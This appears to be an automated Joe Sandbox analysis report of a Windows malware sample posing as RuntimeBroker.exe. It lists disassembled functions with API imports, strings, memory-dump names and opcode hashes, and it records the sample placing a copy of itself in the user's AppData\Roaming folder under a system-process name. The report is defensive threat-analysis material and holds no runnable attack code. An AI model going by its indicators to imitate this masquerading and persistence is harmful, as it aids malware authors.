Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9

MessageBoxW.USER32 ref: 00007FF72B052686
MessageBoxA.USER32 ref: 00007FF72B05269A

Strings

Error, xrefs: 00007FF72B052677
Error/warning (ANSI fallback), xrefs: 00007FF72B05268E

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error$Error/warning (ANSI fallback)
API String ID: 1878133881-653037927
Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction ID: 0abdf55444c5001ce555d8f4659d7062b50a89355b13298ebedb6696a2452218
Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction Fuzzy Hash: D9118E62628B8581FA31AB04E865BA9A364FB48784FD05135DA8C17664DF3CD605CB10

Function 00007FF72B06B8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF72B06B92F
WriteFile.KERNEL32 ref: 00007FF72B06BBF7
WriteFile.KERNEL32 ref: 00007FF72B06BC3D
GetLastError.KERNEL32 ref: 00007FF72B06BCF3

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
Instruction ID: 3dae9bfc67ff5a5ed588d57b68934f092cf885b1609d595cee30ffe311b52fe2
Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
Instruction Fuzzy Hash: EED11872B08A8189E722DF6DD8402BC7775FB487D8B944139CE5D97BA9DE38D106C710

Function 00007FF72B06EC9C Relevance: 6.2, APIs: 4, Instructions: 161COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF72B06ED8C
_get_daylight.LIBCMT ref: 00007FF72B06ED9D
_get_daylight.LIBCMT ref: 00007FF72B06EDAE
_isindst.LIBCMT ref: 00007FF72B06EE79

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
Instruction ID: f8abb6c60e4667fb5b28f40328a6fbffd540294d78cab25feee8e4e29192c84b
Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
Instruction Fuzzy Hash: 0F510672F046118AEB35EF6C9D412BCA7A5EB18358F900139DE1E52AF5DF38E402CB10

Function 00007FF72B064A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF72B064ABF
GetFileInformationByHandle.KERNEL32 ref: 00007FF72B064B21
GetLastError.KERNEL32 ref: 00007FF72B064BB2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72B0649C4), ref: 00007FF72B064BFE

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
Instruction ID: 9d71321bd6c65d40d719e8f776891b42fe228ada2eefde16b2cb41f1114510d6
Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
Instruction Fuzzy Hash: 46518F22F0464189FB61EF79D8503BDA3A1FF48B98F589539DE09477A8DF38D4818B60

Function 00007FF72B052030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF72B052064
SetWindowLongPtrW.USER32 ref: 00007FF72B052086
GetWindowLongPtrW.USER32 ref: 00007FF72B0520B0
InvalidateRect.USER32 ref: 00007FF72B0520D0

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction ID: c8638e91913230c79782100caf983f588930d4d4a28d6d5b07f2496bcbdb15e2
Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction Fuzzy Hash: 8D118A21E0815242F666AB5DED842799251FF88780FD49031DA4906FAACD2DD4D19B20

Function 00007FF72B074E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B070A70: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B070AA3

_get_daylight.LIBCMT ref: 00007FF72B074F44
_get_daylight.LIBCMT ref: 00007FF72B074F55

Strings

?, xrefs: 00007FF72B074ED5

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 03a08327e3a10131aa5bb8fa3ef37a2eed6d70488736d84a243644e572cc7fb3
Instruction ID: bfc7b82fc04d67e8bb8ad6151a97703bd95c905b85d1948e50f44f589680d349
Opcode Fuzzy Hash: 03a08327e3a10131aa5bb8fa3ef37a2eed6d70488736d84a243644e572cc7fb3
Instruction Fuzzy Hash: 58411622F1868242FB76AB29984137DE650EB84BA4F984235EE5D06AF5DF3CD441CF10

Function 00007FF72B06832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06835E

Part of subcall function 00007FF72B069C58: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C6E
Part of subcall function 00007FF72B069C58: GetLastError.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C78

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF72B05BEC5), ref: 00007FF72B06837C

Strings

C:\Users\user\AppData\Roaming\RuntimeBroker.exe, xrefs: 00007FF72B06836A

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: BoundaryDeleteDescriptorErrorFileLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Roaming\RuntimeBroker.exe
API String ID: 3976345311-1543962311
Opcode ID: 53ad205ea1c6cb2f7bb7661613e3da0ecc1c0905bf47b453e04b3a6da8a19941
Instruction ID: 2539bdd8084f1cd2cc6cc6601e85a136772b5529dc3f92943a57d9aae840575e
Opcode Fuzzy Hash: 53ad205ea1c6cb2f7bb7661613e3da0ecc1c0905bf47b453e04b3a6da8a19941
Instruction Fuzzy Hash: 7F419631B08B5685EB36EF299C400BDA394FF497D0B95403AEA4D47B65DE3CE4818B20

Function 00007FF72B06F8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06F916

Part of subcall function 00007FF72B06E8C8: GetCurrentDirectoryW.KERNEL32 ref: 00007FF72B06E908

Strings

:, xrefs: 00007FF72B06F956
., xrefs: 00007FF72B06F967

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: CurrentDirectory_invalid_parameter_noinfo
String ID: .$:
API String ID: 2020911589-4202072812
Opcode ID: a48a17356a0428a0afa3d913acfd81f18579104ff5d62f2c598705e7d941a643
Instruction ID: 3de1c373dcebb7a7a1ded97751d954f820a9a13e697d439caecd80a629144a43
Opcode Fuzzy Hash: a48a17356a0428a0afa3d913acfd81f18579104ff5d62f2c598705e7d941a643
Instruction Fuzzy Hash: 20414122F0875298FB22EBB99C511FC66B4EF18758F94003DDE4D67A69DF3894468B30

Function 00007FF72B06BF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF72B06C05F
GetLastError.KERNEL32 ref: 00007FF72B06C081

Strings

U, xrefs: 00007FF72B06C00B

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
Instruction ID: 873119857340cf7b81fbacf03a0b6f62e81bee505d084e97a1210ff757f0c809
Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
Instruction Fuzzy Hash: 6C41B462B19A8581EB31AF29E8443B9B760FB88794F944035EE4D877A8DF7CD441CB50

Function 00007FF72B06E8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF72B06E908
GetCurrentDirectoryW.KERNEL32 ref: 00007FF72B06E95A

Strings

:, xrefs: 00007FF72B06E91E

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 4406e5919126d02ea3a76b6133a572177de49089f209fdac8df3cc0ad0528a12
Instruction ID: 9fadecb3cbe0a180659dfe13074b00e3369982ddbd98cc857283155f580d1264
Opcode Fuzzy Hash: 4406e5919126d02ea3a76b6133a572177de49089f209fdac8df3cc0ad0528a12
Instruction Fuzzy Hash: 0621C322B0878181EB71AB19D85427EF3A1FB88B48FD54039D68D436A5DF7CE545CF60

Function 00007FF72B05F068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF72B05F0B8
RaiseException.KERNEL32 ref: 00007FF72B05F0F9

Strings

csm, xrefs: 00007FF72B05F0E6

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction ID: 89fd6c935d8d503beee6f9cc5e23c572ea05b56471c3aedf89196a466fab4410
Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction Fuzzy Hash: 66112E36619B4582EB629B19F840269B7E4FB88B84F584231DBCD07B68DF3CD5518B10

Function 00007FF72B06FA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06FA7C
GetDriveTypeW.KERNEL32 ref: 00007FF72B06FABC

Strings

:, xrefs: 00007FF72B06FAA5

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction ID: 6141efd89a2519dc5b38a0b070ed4cf00c9d334f55a5d81c2ab38af2b1b0785d
Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction Fuzzy Hash: 80018461B1C24285F732BF689C6127EA390FF4C748FC41039D55D826A5DE7CE504CE24

Analysis Process: RuntimeBroker2.0.exePID: 7176, Parent PID: 6912COMMON

Executed Functions

Function 00007FFD9B880820 Relevance: 5.5, Strings: 4, Instructions: 507COMMON

Download Yara Rule

Strings

;O_I, xrefs: 00007FFD9B880C04
>O_I, xrefs: 00007FFD9B880904
=O_I, xrefs: 00007FFD9B880A04
<O_I, xrefs: 00007FFD9B880B04

Memory Dump Source

Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd

Similarity

API ID:
String ID: ;O_I$<O_I$=O_I$>O_I
API String ID: 0-1966683728
Opcode ID: 055e95be56c063c2dc3423310bfa78102f8bc9aef103898d036b3a454a73e798
Instruction ID: c149b1155a50d163dbd434b02dae0bfed309ab1abfc79431b575e46d11563b33
Opcode Fuzzy Hash: 055e95be56c063c2dc3423310bfa78102f8bc9aef103898d036b3a454a73e798
Instruction Fuzzy Hash: ABF10A93B1FEC50FFB6147AC18691245EA1FF95A5075905FBE0E88B1FFB824AE058381

Function 00007FFD9B880958 Relevance: 4.3, Strings: 3, Instructions: 539COMMON

Download Yara Rule

Strings

;O_I, xrefs: 00007FFD9B880C04
=O_I, xrefs: 00007FFD9B880A04
<O_I, xrefs: 00007FFD9B880B04

Memory Dump Source

Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd

Similarity

API ID:
String ID: ;O_I$<O_I$=O_I
API String ID: 0-2959341866
Opcode ID: fdaf68afa6281beba8e2d014a5600439cd57b09121f16d638109efe665776648
Instruction ID: 7aa00354e9454d67c43065fb68165b07ce7c07f7eb7fc08f4ccdae49ccc15fcb
Opcode Fuzzy Hash: fdaf68afa6281beba8e2d014a5600439cd57b09121f16d638109efe665776648
Instruction Fuzzy Hash: 10024C53A1FEC50FE77157A818751647FA1EF4AA5074906FBE0E8CB1FBE824AE068341

Function 00007FFD9B8823F2 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbcc17edf633abd0fb6c368175323d8ab172a36b664c90e5163a00206316604c
Instruction ID: 605ad6211fc83009703c026bb1d998c77eeaf6411895b1df6a1ec5c188277c24
Opcode Fuzzy Hash: bbcc17edf633abd0fb6c368175323d8ab172a36b664c90e5163a00206316604c
Instruction Fuzzy Hash: 8CC1B730B19E4E8FEB99EF58C465AA977E1FF58300F140569E45AC72D6CE34E842C741

Function 00007FFD9B880E65 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32fe51e102beaac8e5f6182dbd6ea8094de38d6c016a52a272eaf7aaae40e9d1
Instruction ID: e81a68915cc50355fb4eeed49bf18cbca61d41cd13293c272e00d47a740c66c0
Opcode Fuzzy Hash: 32fe51e102beaac8e5f6182dbd6ea8094de38d6c016a52a272eaf7aaae40e9d1
Instruction Fuzzy Hash: 2181DC21A1DACE4FE746DB2C84719A9BFB1EF5B380B4545E6D188CB2DBC9246C86C311

Function 00007FFD9B88204C Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ba58afd3f7f74c21cc57ef638dd6a309481f979ba971b949a09c988d599f405
Instruction ID: 25251d543e8db8a49acf9e1c31753571ebcacc7a693bb305b854bbda111fae92
Opcode Fuzzy Hash: 7ba58afd3f7f74c21cc57ef638dd6a309481f979ba971b949a09c988d599f405
Instruction Fuzzy Hash: 9D71CA70A09A8F8FDB89DF58C451AAA77F1FF5D300F1046A9D459CB2D5CA34E942CB81

Function 00007FFD9B882448 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3006d5f944b166d4a7ac72027e54f0f26ca5feca3bfe4aa0dde515016b618f35
Instruction ID: 7001d30386b206181524b7fb50d3cbd114275072ab9f2f415251a08dce6b1dc7
Opcode Fuzzy Hash: 3006d5f944b166d4a7ac72027e54f0f26ca5feca3bfe4aa0dde515016b618f35
Instruction Fuzzy Hash: F1514431B19E4E8FDBA8EF58C464AAA77E1FF58310B150579E41AC7295CE34E841CB41

Function 00007FFD9B883B5D Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d70849a95049daae787b25c5e9e6ed0a0ad35083211f7815983a21c24a008bd
Instruction ID: 05f790879af7c5c630edc06adfdb5a99c41103421ec4dcccbdab5e074ac3c208
Opcode Fuzzy Hash: 1d70849a95049daae787b25c5e9e6ed0a0ad35083211f7815983a21c24a008bd
Instruction Fuzzy Hash: 5351B270908B1C8FDB58EF98D8456EDBBF1FB99310F00826BE449D7256DA34A945CBC2

Function 00007FFD9B880D15 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5ea616e3f6beeff4e4e1c00b07f89fe3d2d918e1f1a01d965f0d96efafd4fd
Instruction ID: ac11d50a99c9194e79c4e8da3905cc6ef894485b5d6efd253323a58423f5e03e
Opcode Fuzzy Hash: 6e5ea616e3f6beeff4e4e1c00b07f89fe3d2d918e1f1a01d965f0d96efafd4fd
Instruction Fuzzy Hash: F0119F22F2AD5E4BF7B497A848316F972D2EF49750F460276D43CC31E3DD287A1A0682

Function 00007FFD9B8810C9 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76dcfaf9b748d265e78a8123abb61f99c7d0c098c4482cc4a3da5ff13684668b
Instruction ID: 795ca5fe5dc203bedf48255dce15c88c1c1c36f0abe6b02ce1c0aed832595993
Opcode Fuzzy Hash: 76dcfaf9b748d265e78a8123abb61f99c7d0c098c4482cc4a3da5ff13684668b
Instruction Fuzzy Hash: 0CF0EC1161FB950FE36993AD48612657EE1DB4D500F0581FFD099D76E3C8995C424351

Function 00007FFD9B8823BD Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62d473f50ee0975a8bbd48a29f561d7c5e0e600ce5d9b3cf7383629e381653c6
Instruction ID: c8e0100cb4387a64ab2fafb8460a6a878af0376b5d38179e8e0f46e9bea33f95
Opcode Fuzzy Hash: 62d473f50ee0975a8bbd48a29f561d7c5e0e600ce5d9b3cf7383629e381653c6
Instruction Fuzzy Hash: 82E0C221F5581E4EEB48B7B47C369FDF245DFC9200BD10872E02DC30CBDD2925120282

Function 00007FFD9B88230E Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

